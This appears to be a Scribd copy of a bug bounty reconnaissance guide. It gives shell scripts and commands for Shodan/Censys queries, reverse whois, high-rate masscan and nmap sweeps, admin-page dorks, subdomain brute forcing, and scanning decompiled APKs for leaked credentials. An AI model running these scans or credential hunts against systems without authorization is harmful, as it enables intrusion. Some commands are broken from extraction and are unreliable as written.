0% found this document useful (0 votes)

19 views130 pages

Bug Bounty Hunting

The document is a comprehensive guide for bug bounty hunters detailing various methods and tools for identifying vulnerabilities in web applications and mobile apps. It covers techniques such as subdomain enumeration, content discovery, and the use of APIs for data gathering from platforms like Shodan and Censys. Additionally, it includes scripts and commands for executing these techniques effectively.

Uploaded by

kp.admob

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

0% found this document useful (0 votes)

19 views130 pages

Bug Bounty Hunting

Uploaded by

kp.admob

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

You are on page 1/ 130

Bug Bounty

Hunting

Guide To Find

Vulnerabilities
Bug Bounty Live

Web applications Bug Hunter

TomNomNo m
Your VPS

APK Mobile Applications Root Domains IPv4 Clouds

AWS
Related Search Engines Reverse DNS Acquisitions Shodan BGP
Google
Reverse Whois Crt.sh BigDomainData Crunchbase Censys IPinfo
Azure
BigDomainData Shodan Tracxn Cut-CDN whois
Securitytrails masscan
mapcidr
Builtwith Censys TLS-scan
DMARC
sort
unfurl
dnsx nmap Monitorize
tlsx
sort
unfurl

whois IPs Validation

Dorks

Monitorize
Shodan

Subdomains Enumeration Subdomains Brute Forcing Code Environments

Passive dnsx

amass Github
subfinder Rapid7

Third-level Subdomains
Subdomains Validation

APEXs Permutation AND TLDs Alterations

Subdomains Permutation AND Alterations
dnsx
gotator

Resolvable Subdomains AND HTTP Service

dnsx
nmap
httprobe
HTTP Analysis
Origin IP
Screen Shots Content Discovery VHost
Scanner
Content Brute Forcing
gowitness
Spidering Enumeration ffuf
httpx IIS Short Name Fuzzuli
GAU Nuclei
Katana xurlfind3r SNS Feroxbuster
Dorks AEM Shortscan FFUF
Waymore

JS Sensitive Information Disclosure Parameters OR Headers

Attack Surface
APK Mobile Applications
1 - Downlaod

apkmirror

Uptodown

APK Mobile Applications

2 - APK Decompiler

Jadx

┌──(mahmoud㉿mohamed)-[~]
└─$ bash jadx --threads-count 10 --show-bad-code --deobf --deobf-min 2
--deobf-use-sourcename --deobf-parse-kotlin-metadata --deobf-rewrite-cfg
--rename-flags all --output-dir OUTPUT app.apk

APK Mobile Applications

3 - Leaked Credentials

Trufflehog

┌──(mahmoud㉿mohamed)-[~]
└─$ trufflehog filesystem --directory OUTPUT

noseyparker

┌──(mahmoud㉿mohamed)-[~]
└─$ noseyparker scan --datastore ORG OUTPUT

┌──(mahmoud㉿mohamed)-[~]
└─$ noseyparker report --datastore ORG
Root Domains
1 - Related

Reverse Whois

┌──(mahmoud㉿mohamed)-[~]
└─$ python3 related-domains.py --source builtwith,crtsh,whoxy --key 'KEY' --domain

#!/usr/bin/env bash

WHOXYQuery="ORG+Inc"
WHOXYKey="KEY"

for ((Page = 1 ; Page <= MAX-Page ; Page++))

do
curl -s "https://api.whoxy.com/?key=$WHOXYKey&reverse=whois&company=$WHOXYQuery&mode=micro&page=$Page" | jq -r
'.search_result[].domain_name' | tee -a WHOXY-TLD.txt
sleep 2
done

#!/usr/bin/env bash

WHOXYQuery="ROOT"
WHOXYKey="KEY"

for ((Page = 1 ; Page <= MAX-Page ; Page++))

do
curl -s "https://api.whoxy.com/?key=$WHOXYKey&reverse=whois&keyword=$WHOXYQuery&mode=micro&page=$Page" | jq -r
'.search_result[].domain_name' | tee -a WHOXY-TLD.txt
sleep 2
done

BigDomainData

https://api.bigdomaindata.com/?key=KEY&database=current&registrant_company=ORG+Inc&page_size=5000

Builtwith

https://builtwith.com/relationships/domain.com
Root Domains
2 - Search Engines

Crt.sh

┌──(mahmoud㉿mohamed)-[~]
└─$ curl -sk 'https://crt.sh/?output=json&q=ORG+Inc' | jq -r '.[].common_name'

Shodan

#!/usr/bin/env bash

SHODANQuery="ssl:%22ORG+Inc%22"
SHODANKey="KEY"

SHODANCount=$(curl -s "https://api.shodan.io/shodan/host/search?key=$SHODANKey&query=$SHODANQuery" | jq -r .total)

SHODANIters=$(expr "$SHODANCount" / 99 + 10)

for ((SHODANPage = 1 ; SHODANPage <= "$SHODANIters" ; SHODANPage++))

do
curl -s "https://api.shodan.io/shodan/host/search?key=$SHODANKey&query=$SHODANQuery&page=$SHODANPage" | jq -r '.matches[].hostnames[]?' | tee
-a Subdomains-SHODAN.txt
sleep 2
done

┌──(mahmoud㉿mohamed)-[~]
└─$ bash shodan.sh

Censys

#!/usr/bin/env bash

CENSYSQuery="services.tls.certificates.leaf_data.subject.organization:ORG\bInc"
CENSYSAPIID="ID"
CENSYSSecret="KEY"

CENSYSCount=$(curl -s -u "$CENSYSAPIID":"$CENSYSSecret" -H 'Content-Type: application/json'

"https://search.censys.io/api/v2/hosts/search?q=$CENSYSQuery&virtual_hosts=ONLY&per_page=100" | jq -r .result.total)
CENSYSIters=$(expr "$CENSYSCount" / 100 + 1)
CENSYSCursor=""

for ((CENSYSPage = 1 ; CENSYSPage <= "$CENSYSIters" ; CENSYSPage++))

do
curl -s -u "$CENSYSAPIID":"$CENSYSSecret" -H 'Content-Type: application/json'
"https://search.censys.io/api/v2/hosts/search?q=$CENSYSQuery&virtual_hosts=ONLY&per_page=100&cursor=$CENSYSCursor" | jq -r .result.hits[].name |
tee -a Subdomains-CENSYS.txt
sleep 2
CENSYSCursor=$(curl -s -u "$CENSYSAPIID":"$CENSYSSecret" -H 'Content-Type: application/json'
"https://search.censys.io/api/v2/hosts/search?q=$CENSYSQuery&virtual_hosts=ONLY&per_page=100&cursor=$CENSYSCursor" | jq -r .result.links.next)
done

┌──(mahmoud㉿mohamed)-[~]
└─$ bash censys.sh

unfurl

┌──(mahmoud㉿mohamed)-[~]
└─$ cat all-search-engines.txt | unfurl --unique apexes
Root Domains
3 - Reverse DNS

BigDomainData

https://api.bigdomaindata.com/?key=KEY&database=current&name_servers=NS&page_size=5000

Securitytrails

https://securitytrails.com/domain/domain.com/dns

dmarc.live

https://dmarc.live/info/domain.com

Root Domains
4 - Acquisitions

Crunchbase

https://www.crunchbase.com/home

Tracxn

https://platform.tracxn.com
IPv4
1 - Search Engines

Shodan

#!/usr/bin/env bash

SHODANQuery="ssl:%22%22"
SHODANKey="KEY"

SHODANCount=$(curl -s "https://api.shodan.io/shodan/host/search?key=$SHODANKey&query=$SHODANQuery" | jq -r .total)

SHODANIters=$(expr "$SHODANCount" / 99 + 10)

for ((SHODANPage = 1 ; SHODANPage <= "$SHODANIters" ; SHODANPage++))

do
curl -s "https://api.shodan.io/shodan/host/search?key=$SHODANKey&query=$SHODANQuery&page=$SHODANPage" | jq -r
.matches[].ip_str | grep -E "[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}" | tee -a IPs-DB.txt
sleep 2
done

┌──(mahmoud㉿mohamed)-[~]
└─$ bash shodan.sh

Censys

#!/usr/bin/env bash

CENSYSQuery="services.tls.certificates.leaf_data.subject.organization:ORG\bInc"
CENSYSAPIID="ID"
CENSYSSecret="KEY"

CENSYSCount=$(curl -s -u "$CENSYSAPIID":"$CENSYSSecret" -H 'Content-Type: application/json'

"https://search.censys.io/api/v2/hosts/search?q=$CENSYSQuery&virtual_hosts=INCLUDE&per_page=100" | jq -r .result.total)
CENSYSIters=$(expr "$CENSYSCount" / 100 + 1)
CENSYSCursor=""

for ((CENSYSPage = 1 ; CENSYSPage <= "$CENSYSIters" ; CENSYSPage++))

do
curl -s -u "$CENSYSAPIID":"$CENSYSSecret" -H 'Content-Type: application/json'
"https://search.censys.io/api/v2/hosts/search?q=$CENSYSQuery&virtual_hosts=INCLUDE&per_page=100&cursor=$CENSYSCurso
r" | jq -r .result.hits[].ip | grep -E "[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}" | tee -a IPs-DB.txt
sleep 2
CENSYSCursor=$(curl -s -u "$CENSYSAPIID":"$CENSYSSecret" -H 'Content-Type: application/json'
"https://search.censys.io/api/v2/hosts/search?q=$CENSYSQuery&virtual_hosts=INCLUDE&per_page=100&cursor=$CENSYSCurso
r" | jq -r .result.links.next)
done

┌──(mahmoud㉿mohamed)-[~]
└─$ bash censys.sh

cut-cdn

┌──(mahmoud㉿mohamed)-[~]
└─$ cut-cdn -update-all -silent -ip IPs-DB.txt
IPv4
2 - BGP

bgp.he

https://bgp.he.net/dns/domain.com

ipinfo

https://ipinfo.io/products/ranges-api

#!/usr/bin/env bash

for cird in `cat BGP.txt`

do
whois $(echo $cird | awk -F '/' '{print $1}') | tee $(echo $cird | awk -F '/' '{print $1 "-" $2}')
sleep 10
done

┌──(mahmoud㉿mohamed)-[~]
└─$ bash whois.sh

Mapcidr

┌──(mahmoud㉿mohamed)-[~]
└─$ mapcidr -sort -silent -cidr validCIRD.txt
IPv4
3 - Clouds Enumeration

AWS

┌──(mahmoud㉿mohamed)-[~]
└─$ curl -s https://ip-ranges.amazonaws.com/ip-ranges.json | jq -r
'.prefixes[].ip_prefix' | grep -E '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}/[0-9]{1,2}'

Google

┌──(mahmoud㉿mohamed)-[~]
└─$ curl -s 'https://www.gstatic.com/ipranges/goog.txt' | grep -E
‘[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}/[0-9]{1,3}’

Azure

┌──(mahmoud㉿mohamed)-[~]
└─$ cat Azure.json | jq -r '.values[].properties.addressPrefixes[]' | grep -E
‘[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}/[0-9]{1,3}’

masscan

┌──(mahmoud㉿mohamed)-[~]
└─$ sudo masscan --rate 100000 --open-only --retries 5 --wait 60 -p 443 -iL
Clouds-CIDRs.txt -oL Cloud-443.txt

┌──(mahmoud㉿mohamed)-[~]
└─$ cat Cloud-443.txt | awk {'print $4'} | awk NF | sort -u | IPs-443.txt

tls-scan

┌──(mahmoud㉿mohamed)-[~]
└─$ tls-scan --port 443 --concurrency 150 --timeout 10 --cacert ca-bundle.crt 2>
/dev/null --infile IPs-443.txt --outfile IPs-443.json

┌──(mahmoud㉿mohamed)-[~]
└─$ jq --slurp -r '.[] | select(.certificateChain[]?.subject | test("ORG(,)? Inc")) | .ip | @text' IPs.443.json
Root Domains
5 - DNS PTR record

dnsx

┌──(mahmoud㉿mohamed)-[~]
└─$ cat IPv4 | dnsx -retry 3 -threads 300 -stats -silent -resp-only -ptr | tee -a dnsx.txt

Root Domains
6 - TLS subject alternative and common names

nmap

┌──(mahmoud㉿mohamed)-[~]
└─$ sudo nmap -sS -n -Pn -p- --max-hostgroup 1 --max-rtt-timeout 100ms --min-rate
65535 --resolve-all --open --script ssl-cert.nse -iL IPv4 -oX Output.xml

tew

┌──(mahmoud㉿mohamed)-[~]
└─$ tew -x Output.xml | tee -a IN.txt

tlsx

┌──(mahmoud㉿mohamed)-[~]
└─$ cat IN.txt | tlsx -silent -resp-only -concurrency 300 -retry 3 -san -cn | tee -a tlsx.txt

unfurl

┌──(mahmoud㉿mohamed)-[~]
└─$ cat dnsx.txt tlsx.txt | unfurl --unique apexes
Root Domains
7 - APEXs Permutation AND TLDs Alterations

dnsx

#!/usr/bin/env bash

for ROOT in `cat ROOTWORDS.txt`

do
for TLD in `cat TLDWORDS.txt`
do
echo "$1.$TLD"
echo ""$ROOT"$1.$TLD"
echo "$ROOT-$1.$TLD"
echo "$1$ROOT.$TLD"
echo "$1-$ROOT.$TLD"
done
done

┌──(mahmoud㉿mohamed)-[~]
└─$ bash ROOTPermutation.sh | tee -a ROOTOUT.txt

┌──(mahmoud㉿mohamed)-[~]
└─$ cat ROOTOUT.txt | dnsx -retry 3 -threads 300 -stats -silent -recon | tee -a
dnsx-ROOT.txt

grep

┌──(mahmoud㉿mohamed)-[~]
└─$ grep -il 'COMM' dnsx-ROOT.txt | awk '{print $1}' sort -u | tee -a valid-TLD.txt
IPv4
4 - IPv4 Monitorize

anew

┌──(mahmoud㉿mohamed)-[~]
└─$ cat IN.txt | awk -F ':' '{print $1}' | tee -a alive.txt

┌──(mahmoud㉿mohamed)-[~]
└─$ cat IPv4 | anew -d alive.txt | tee scan.txt

masscan

┌──(mahmoud㉿mohamed)-[~]
└─$ sudo masscan --rate 100000 --open-only --retries 5 --wait 60 -p 443 -iL scan.txt
-oL alive-443.txt

┌──(mahmoud㉿mohamed)-[~]
└─$ cat alive-443.txt | awk {'print $4'} | awk NF | sort -u | HTTPS-443.txt

┌──(mahmoud㉿mohamed)-[~]
└─$ sudo masscan --rate 100000 --open-only --retries 5 --wait 60 -p 80 --excludefile
HTTPS-443.txt -iL scan.txt -oL alive-80.txt

┌──(mahmoud㉿mohamed)-[~]
└─$ cat alive-80.txt | awk {'print $4'} | awk NF | sort -u | HTTP-80.txt
IPv4
4 - IPv4 Monitorize

masscan

┌──(mahmoud㉿mohamed)-[~]
└─$ sudo masscan --rate 100000 --open-only --retries 5 --wait 60 --conf masscan.conf
-iL scan.txt -oX alive-TOP-1000.xml

ports =
80,443,7547,8080,8089,4567,8008,8443,8081,2087,2083,2082,5985,2086,1024,8888,8000,8880,9080,81,5000,49152,9000,8085
,7170,5001,3128,8001,8090,9999,10443,9090,8083,5357,3000,9100,52869,9306,82,88,8010,4443,7443,9443,10000,8181,9001,
6443,444,8086,2096,7777,10001,8200,2095,8009,9002,8800,6000,9009,9200,5005,83,3001,5555,32400,1900,6001,8099,8889,7
001,50000,9998,5006,5986,20000,8123,8060,2222,84,8069,12345,888,10250,7548,631,8098,5222,2000,8112,8087,7171,5010,2
077,8126,7779,7071,5601,8139,3389,8834,4040,5007,9943,9191,5009,1935,5900,8082,8020,9295,4848,2480,4500,5672,8140,2
079,554,2345,3299,1433,1521,6666,49153,389,587,1177,9600,1025,9092,2053,25,9944,9761,2052,3790,4911,9051,8088,9151,
2121,9160,2181,9869,9981,9530,636,60001,9042,10243,9633,9595,9418,8334,18081,7415,8333,55442,8500,8159,7474,5432,8
991,9302,17000,2154,7989,9305,9304,9303,9307,7657,7218,55443,8291,11000,50070,55000,9091,6363,5800,7634,55553,6667
,50050,6664,8545,6633,6653,50100,51106,6668,8649,6697,54138,55554,8728,8002,5025,7080,7000,85,6379,7676,3689,12000,
800,51235,4899,1723,666,3333,5858,8084,5801,5901,6264,5560,5577,9444,37215,8003,8999,4242,5984,5172,4282,1311,90,90
03,1200,2081,5269,7081,8091,2323,2002,13579,4321,3542,3541,3780,3749,4664,3306,4782,4949,11300,8006,5938,11211,484
0,8383,4063,3310,9101,11112,4506,8011,1400,8899,8004,7005,21025,4786,4433,4369,16992,5431,16010,25001,3388,23424,8
005,102,8989,16993,9013,8554,14147,8096,8012,1883,9004,8015,2375,808,8043,3260,2008,21379,35000,9005,25105,4430,91
02,7070,8180,2376,2455,8445,7002,20256,25565,2404,9037,28017,8014,7010,8016,9089,4064,20547,8092,37777,2379,52881,
9010,27017,8100,8021,8022,2332,9099,9211,110,8282,9212,32764,9213,7003,8093,3129,7014,18245,89,2761,8013,1026,9663,
2762,7004,7999,9527,33060,8101,8843,9006,9201,9082,9011,8182,9008,8025,9094,9997,5443,9021,8007,8050,9105,8787,995,
9036,9103,9095,9035,9020,41800,221,8663,8887,5400,9215,6080,9023,8095,9210,2100,6002,10554,86,8030,44158,9015,8444,
23023,6352,6003,7788,8018,9097,999,9109,9014,8890,9096,9007,9070,9205,9018,8026,9207,9898,9208,9220,2200,1023,9214,
2067,9093,9209,6006,6005,9027,9084,143,789,9012,9088,5002,9550,9111,9988,2150,8881,9047,9955,9034,9016,9098,9046,60
08,9119,9017,70,8019,9300,8042,9251,7090,311,1099,8448,9044,9876,8017,8097,4100,44818,6588,119,2111,9202,9199,9966,
1080,1741,9050,8848,8031,8033,1471,9189,9104,8190,9030,4117,1000,9445,9301,6004,8401,8553,9040,9990,8106,8686,9222,
9033,8032,9221,8585,9311,993,104,2122,1153,2126,902,1604,6789,9992,9203,8801,9204,503,8885,9029,9024,8040,9216,992,
8028,8048,21,9025,9217,8029,6605,9389,9299,9682,9218,9031,9219,9690,9108,9606,9019,9110,9026,9861,6007,9048,8051,84
47,9028,9704,9043,8866,9743,9765,771,9022,8072,8058,8094,6010,79,9041,7500,9045,9032,9039,9500,9106,548,8111,9107,9
206,9038,8071,8849,502,91,10134,9049,6009,7776,7445,113,7510,8789,264,515,873,9991,8446,9136,8602,8102,135,1962,840
4,3100,49,8023,195,3005,8808,1500,1911,8990,8765,179,9994,4157,9309,3080,11,7535,9310,8811,27015,8064,445,9993,9308,
2628,5080,8036,5050,8442,8027,9899,111,13,465,3120,6036,15,8184,3443,7654,8035,8034,7465,8812,3460,6565,37,8103,17,1
00,8118,1599,9433,92,6601,9950,7778,8110,175,8024,6503,8038,8813,19,7979,8815,8104,8066,8405,8055,1027,8816,3479,88
44,8935,8819,8105,8700,6748,8802,8041,6955,2020,4445,8108,8052,8222,7444,8107,5500,7700,5003,8053,5090,8047,8045,81
09,8779,8804,6662,7998,4001,8049,8056,8877,22222,8891,4010,8044,8054,8805,8243,8820,1050,3111,8057,6308,8046,8666,7
493,8859,43,8803,843,7433,8733,8429,8037,8403,7401,8143,7887,7537,6161,8420,8810,87,801,6622,8039,8857,8411,8237,20
48,6600,99,8249,8868,555,6603,1947,6543,6887,8806,8988,8850,3200,8513,5004,8251,8833,8823,8433,8590,8822,4730,8586,
8846,6102,8252,6580,8863,8688,8402,8248,3002,8860,8431,8241,6464,8236,8790,8858,22,8807,8864,6511,8855,8238,2443,65
10,8878,5567,6581,8993,8410,8239,8417,8430,6998,8809,8416,8788,8419,8408,8432,8818,6512,8406,8827,6590,8766,8424,84
28,8415,6602,8418,8423,8852,8421,8425,8851,8821,6550,8838,8854,8409,8412,8969,8422,6262,8830,8867,8414,8870,8845,84
27,8824,8879,8407,8865,8875,8826,8814,8426,8413,8861,8836,8767,6560,8842,6650,8841,8874,8862,8832,6561,8782,8784,88
40,8871,8791,8825,8869,8829,8621,8873,8622,8839,8853,8817,8856,8847,8828,8872,8831,8876,8837,8623,8835,8637,3101,31
21,1515,447,5280,3112,3114,3103,3108,3102,3105,3110,3107,3109,3113,2030,3116,3117,3118,2080,3115,3104,3106,5605,311
9,23,5606,96,5595,5446,5596,1290,60129,5906,1111,97,448,5569,4999,2003,685,3910,2021,880,4002,5600,26,994,4343,2233,
4523,5568,1028,5150,5201,4200,180,4545,3838,5597,2320,5607,2001,2232,2010,5907,2012,5070,5599,3337,62078,4118,4505,
5454,2259,5602,5542,5598,5609,2031,5592,5122,5603,5190,5591,5593,5209,3311,5590,5822,3690,5494,53,5594,5909,5604,56
73,3950,5910,3550,5608,5853,5908,5321,2050,3568,3951,1110,3555,98,3952,3570,3548,3566,3567,3793,3953,3552,4043,3524
,3554,3954,3523,3221,3794,3569,1234,3556,3792,3557,3562,3503,3551,3521,3563,3922,3558,3791,3522,3559,3560,4700,4042
,4747

tew

┌──(mahmoud㉿mohamed)-[~]
└─$ tew -x alive-TOP-1000.xml | tee -a IN.txt
Root Domains Validation
1 - whois validation

whois

#!/usr/bin/env bash

for tld in `sort -u all-TLD.txt`

do
whois $tld | tee $tld
sleep 10
done

┌──(mahmoud㉿mohamed)-[~]
└─$ bash whois.sh

grep

┌──(mahmoud㉿mohamed)-[~]
└─$ grep -ril 'ORG' | sort -u | tee -a valid-TLD.txt
Dorks
1 - Search Engines

ssl:"ORG" services.tls.certificates.leaf_data.subject.organization="ORG"

hostname:ROOT.TLD dns.names:"ROOT.TLD"

https://web.archive.org/cdx/search?url=ROOt.TLD&matchType=domain&collapse=urlkey&fl=original

urlscan.io
page.domain:"ROOT.TLD"
Dorks
2 - Search Engines

google
Google
site:ROOT.TLD intitle:"dashboard"

Google Search I’m Feeling Lucky

bing
bing
site:ROOT.TLD AND filetype:pdf

yahoo
yahoo !
site:ROOT.TLD

duckduckgo
DuckDuckGo
site:ROOT.TLD

startpage
Startpage
site:ROOT.TLD filetype:pdf
Dorks
3 - ( Google - Yahoo - Duckduckgo - Startpage ) search operators

site:ROOT.TLD (signup|sign up|registration)

site:ROOT.TLD filetype:pdf
site:ROOT.TLD intitle:(contact|admin)
site:ROOT.TLD inurl:(admin|log)

Google
yahoo ! Startpage
DuckDuckGo
4 - Bing search operators

bing
site:ROOT.TLD (signup|sign up|registration)
site:ROOT.TLD filetype:pdf
site:ROOT.TLD inurl:(contact|log)

ip:I.P.v.4
Root Domains Monitorize
1 - Configure Discord Notifications

Shodan

https://help.shodan.io/shodan-monitor/discord-notifier

Root Domains Monitorize

2 - Monitor Domain

Shodan

https://monitor.shodan.io/networks/domain
Root Domains Monitorize
1 - Configure Discord Notifications

Shodan

https://help.shodan.io/shodan-monitor/discord-notifier

Root Domains Monitorize

2 - Monitor Domain

Shodan

https://monitor.shodan.io/networks/domain
Subdomains Enumeration
1 - Passive

amass v3.23.3

#!/usr/bin/env bash

for DOMAIN in `sort -u valid-TLD.txt`

do
amass enum -passive -config config.ini -timeout 90 -d $DOMAIN | tee -a OUTamass.txt
done

┌──(mahmoud㉿mohamed)-[~]
└─$ bash amass.sh

subfinder

#!/usr/bin/env bash

for DOMAIN in `sort -u valid-TLD.txt`

do
subfinder -silent -no-color -disable-update-check -provider-config provider-config.yaml -all -timeout 90 -domain
$DOMAIN | anew OUTamass.txt
done

┌──(mahmoud㉿mohamed)-[~]
└─$ bash subfinder.sh

GH Subdomains

#!/usr/bin/env bash

for DOMAIN in `sort -u valid-TLD.txt`

do
github-subdomains -raw -t 'GH-Token' -d $DOMAIN | anew OUTamass.txt
done

┌──(mahmoud㉿mohamed)-[~]
└─$ bash github-subdomains.sh

rapid7

┌──(mahmoud㉿mohamed)-[~]
└─$ cat Rapid7FDNS.gz | pigz -dc | grep -E '(\.ONE\.TLD"|\.TWO\.TLD"|)'

┌──(mahmoud㉿mohamed)-[~]
└─$ jq -r '.name' rapid7OUT.json | anew OUTamass.txt
Subdomains Enumeration
2 - Third-level Subdomains

dsieve

#!/usr/bin/env python3

import os
import sys
import argparse

parser = argparse.ArgumentParser()
parser.add_argument( "-f","--file",help="file that contains list of subdomains" )
parser.parse_args()
args = parser.parse_args()

if args.file:
if os.path.isfile(args.file):
list_of_subdomains = open( args.file, 'r' )
file_of_subdomains = list_of_subdomains.read().split('\n')
list_of_subdomains.close()
else:
parser.error( '%s file not found' % args.file )

for subdomain in file_of_subdomains :

try :
if subdomain.count(".") > 3 :
print(subdomain)
except :
sys.exit()

┌──(mahmoud㉿mohamed)-[~]
└─$ python3 third-level-domains.py | tee 3levelOUT.txt

┌──(mahmoud㉿mohamed)-[~]
└─$ dsieve -if 3levelOUT.txt -f 3 | sort -u | tee 3Level-enumeration.txt
Subdomains Enumeration
3 - Third-level Subdomains Enumeration

amass v3.23.3

#!/usr/bin/env bash

for DOMAIN in `sort -u 3Level-enumeration.txt`

do
amass enum -passive -config config.ini -timeout 90 -d $DOMAIN | tee
-a OUTamass.txt
done

┌──(mahmoud㉿mohamed)-[~]
└─$ bash amass.sh

subfinder

#!/usr/bin/env bash

for DOMAIN in `sort -u 3Level-enumeration.txt`

do
subfinder -silent -no-color -disable-update-check -provider-config
provider-config.yaml -all -timeout 90 -domain $DOMAIN | anew
OUTamass.txt
done

┌──(mahmoud㉿mohamed)-[~]
└─$ bash subfinder.sh
Subdomains Brute Forcing
1 - Common Words

about crazyegg hello ora

snapshots
access creative help orchestration
software
account crello helpdesk org
solutions
accounting crm history origin
sonarqube
active crowd hotfix outlook
sophos
activecampaign ctl hotjar outreach
sourcecontrol
activtrak customer hub owncloud
sprint
actuator cvent hubot package
sql
adm cvs hubspot pad
square
admin dashboard hubstaff page
squarespace
administrator data hw pages
ssh
administrators database hwcdn panel
ssl
admins dataservices iac partner
sslproxy
adobe db iad partners
staff
ads deals ide pass
stage
aem debugger ids pay
staging
affiliate debugging images paycor
static
agile delete info payment
stats
alerts demo infra payments
status
alpha dependency infrastructure paywall
stg
analytics deploy ingress performance
stitchlabs
apache deployment int photomanager
store
api desktop integrated photos
storeage
apidocs dev integration php
stories
apiserver develop intercom phpmyadmin
strategy
app developer interface pipe
streaming
application development internal pipedrive
stub
applications devops internals pipeline
subscriptions
apply devs interpreter plan
suite
apps devsecops intra plugin
support
articles devtest inventory portal
survey
artifactory disabled invoices powerbi
surveys
asana docker irc pr
svc
asanawp dockerui jenkins prd
svn
assets docs jetcap premium
swag
attendify docsapi jira press
swagger
auth document jmx presskit
system
authenticate documentation jobs preview
systems
authentication documents joomla priv
tableau
authorization domo k8s privacy
taging
autodiscover download kanban private
tdd
automation downloads katana prod
team
aws dropbox kayako production
teamcity
azure drupal kd productions
teramind
azureva dtr keeptruckin products
terminal
backend duo kit profile
terms
backlog dynamic kiwi profiles
test
bamboo ebs kube programming
tester
bamboohr edge kubectl project
testimonials
barcode editor kubernetes projekttag
testing
basecamp elastic lab prometheus
testrail
basex elasticbeanstalk lastpass promo
testrecord
bdd email latin promotions
texteditor
beta emea leadfeeder provisioning
time
bigcommerce endpoint legacy proxy
timecamp
billing engine library public
toggl
bitbucket engineering livechat pullrequest
tomcat
bizzabo environment loadbalancer qa
toolbar
blog epic loadtesting qrcode
tools
branch etherpad logging quickbooks
torrent
brand europe login ratings
trac
bucket europewest looker raw
tracking
bug eventbrite m realtime
tradegecko
bugzilla events machine reclaimyourweb
traffic
build eventzilla magento redir
train
calendar example mail redirect
training
canva exchange mailchimp redirector
trello
careers ext mailgun redis
trial
cart extension maintenance redmine
tutorials
case faq manage reg
uat
cd faqs management region
ui
cdn feature mantisbt register
unittesting
cert feedback market registry
unleashed
certify figma marketing regression
unsubscribe
cgi file marketo releases
upgrade
channeltime financial marketplace repo
upload
chart firewall master repository
uploads
chat fisheye media rescuetime
uptime
chd fiswiki members reset
userstory
checkout fleetcomplete merchant restricted
utmtrackingtools
chef flow merge reviews
velocityehs
ci fogbugz metric rfid
verizonconnect
cin7 forum metrics rollback
version
citrix framework mgmt rollout
versioning
clickup free mgt rpc
video
client freshbooks microsoft runtime
vip
clockify freshdesk middleware s3
virtual
cloud freshsales minecraft salesforce
vm
cloudapp frontend mint salesloft
vpn
cloudflare frontpage mirror samsara
wave
cloudfront ftp mixpanel sandbox
web
cms fullstack mobile sap
webapp
code fw mobileclient scm
webdev
codebase gallery mock scout
webftp
codereview gateway module script
webmail
codeship gcr monday scripted
websockets
community gemalto monday.com scripting
webssh
company geotab monitoring scrum
webstage
compile get mssql sdk
wercker
compiler getter my search
whoami
compli gh mysql secure
wiki
configuration gist nautilus security
wix
confluence git nc seequestor
woocommerce
console github net sendgrid
wordpress
constant gitlab netsuite server
workday
constle gl news service
workpuls
contact global nextcloud services
workspace
container gmail nginx settings
wrike
contests gocd node setup
ws
continuous google northamerica shell
www
control googleanalytics notifications shop
xero
controller gps offers shopify
yesware
convercent grafana oid signed
youtrack
convertkit guides okta signup
zendesk
cookies gusto old sketch
zenefits
core gw onspring skins
zoho
corp harvest openvbx slack
zoom
couchpotato hdb ops smoke
Subdomains Brute Forcing
2 - Generate Wordlist

#!/usr/bin/env bash

for one in `cat COMMONWORDS.txt`

do
echo "$one.$1" >> FUZZ-$1.txt
for num in {1..5}
do
echo "$one$num.$1" >> FUZZ-$1.txt
done

for two in `cat COMMONWORDS.txt`

echo "$two.$one.$1" >> FUZZ-$1.txt

echo "$two$one.$1" >> FUZZ-$1.txt
echo "$two-$one.$1" >> FUZZ-$1.txt
for num in {1..5}
do
echo "$two.$one$num.$1" >> FUZZ-$1.txt
echo "$two-$one$num.$1" >> FUZZ-$1.txt
done
done
done

┌──(mahmoud㉿mohamed)-[~]
└─$ bash generateWORDLIST.sh ROOT.TLD | tee -a dnsx-IN.txt

Subdomains Brute Forcing

3 - Resolvable Subdomains

dnsx

┌──(mahmoud㉿mohamed)-[~]
└─$ cat dnsx-IN.txt | dnsx -retry 3 -threads 300 -resp -no-color -stats -silent -a -aaaa
-cname | tee -a dnsx-OUT.txt
Subdomains Validation
1 - Filter Wildcard Domains

dnsx

#!/usr/bin/env bash

dnsx -l allsubdomains.txt -json -silent -stats -retry 3 -t 300 | tee -a dnsx-OUT.json

clear
jq -r '.host' dnsx-OUT.json | tee Hosts.txt
clear
sed 's/^/mahmoudawali/' Hosts.txt | dnsx -json -silent -stats -retry 3 -t 300 | tee -a Wildcard.json
clear
jq -r '.host' Wildcard.json | sed 's/mahmoudawali//' | tee Wildcards.txt
clear
cat Hosts.txt | anew -d Wildcards.txt| tee -a GOOD-Subdomains.txt
clear
cat Hosts.txt | anew -d GOOD-Subdomains.txt | tee Checking.txt
clear
cat Checking.txt | dnsx -resp -a -silent -stats -retry 3 -t 300 | tee OUT.txt
clear
cat Checking.txt | sed 's/^/mahmoudawali/' | dnsx -resp -a -silent -stats -retry 3 -t 300 | tee IN.txt
clear
sed -i -- 's/mahmoudawali//' IN.txt
clear
cat OUT.txt | anew -d IN.txt | awk '{print $1}' | sort -u | tee Checking.txt
clear
cat Checking.txt | dnsx -resp -cname -silent -stats -retry 3 -t 300 | tee OUT.txt
clear
